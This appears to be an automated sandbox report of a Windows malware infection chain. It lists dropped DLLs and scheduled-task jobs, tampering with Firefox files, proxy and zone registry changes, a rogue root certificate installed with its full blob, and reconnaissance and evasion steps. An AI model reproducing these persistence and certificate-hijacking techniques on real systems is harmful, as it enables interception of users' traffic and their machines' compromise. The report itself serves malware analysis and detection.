File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\f9EQ8fOvhyMvnW887Sq3rGDL.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\f9EQ8fOvhyMvnW887Sq3rGDL.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\f9EQ8fOvhyMvnW887Sq3rGDL.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\hsUwQAlMU\NaYLMLk.xml C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File created C:\Program Files (x86)\dlfHiRefefjU2\qYCnzTh.xml C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\rcdRDIq.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File created C:\Program Files (x86)\QtKEgKYoTGTqC\aOMPEVQ.xml C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File created C:\Program Files (x86)\hsUwQAlMU\AIbtiD.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\NFisFjC.xml C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File created C:\Program Files (x86)\QtKEgKYoTGTqC\kzXLNfj.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File created C:\Program Files (x86)\dlfHiRefefjU2\hAPIZbVthiLDN.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\IXXpLJK.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File created C:\Program Files (x86)\ZEkGlaTFWGUn\DzjrAwW.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File created C:\Program Files (x86)\dlfHiRefefjU2\cnLpLYQJLPpKs.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A
File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\BORoGng.xml C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A
File created C:\Program Files (x86)\QtKEgKYoTGTqC\RxRgHWh.xml C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A
File created C:\Program Files (x86)\ZEkGlaTFWGUn\cfZrGmY.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File created C:\Program Files (x86)\dlfHiRefefjU2\CwCgEqZ.xml C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A
File created C:\Program Files (x86)\QtKEgKYoTGTqC\MAAvfRb.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A
File created C:\Program Files (x86)\hsUwQAlMU\npYJPK.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A
File created C:\Program Files (x86)\hsUwQAlMU\TnOYFwC.xml C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Tasks\ZTNkTKukmvvbOMPkn.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\BjyVbWVaXyfCTlHuI.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ucrVpivlTlXwlAC.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\explortu.job C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe N/A
File created C:\Windows\Tasks\axplont.job C:\Users\Admin\1000004002\689e56283d.exe N/A
File created C:\Windows\Tasks\btZaCbGShXZoJDfvCg.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ZTNkTKukmvvbOMPkn.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ucrVpivlTlXwlAC.job C:\Windows\SysWOW64\schtasks.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pNAFVVp.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\QkKzhNP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Users\Admin\AppData\Local\Temp\7zSDAA1.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\1000004002\689e56283d.exe N/A
N/A N/A C:\Users\Admin\1000004002\689e56283d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
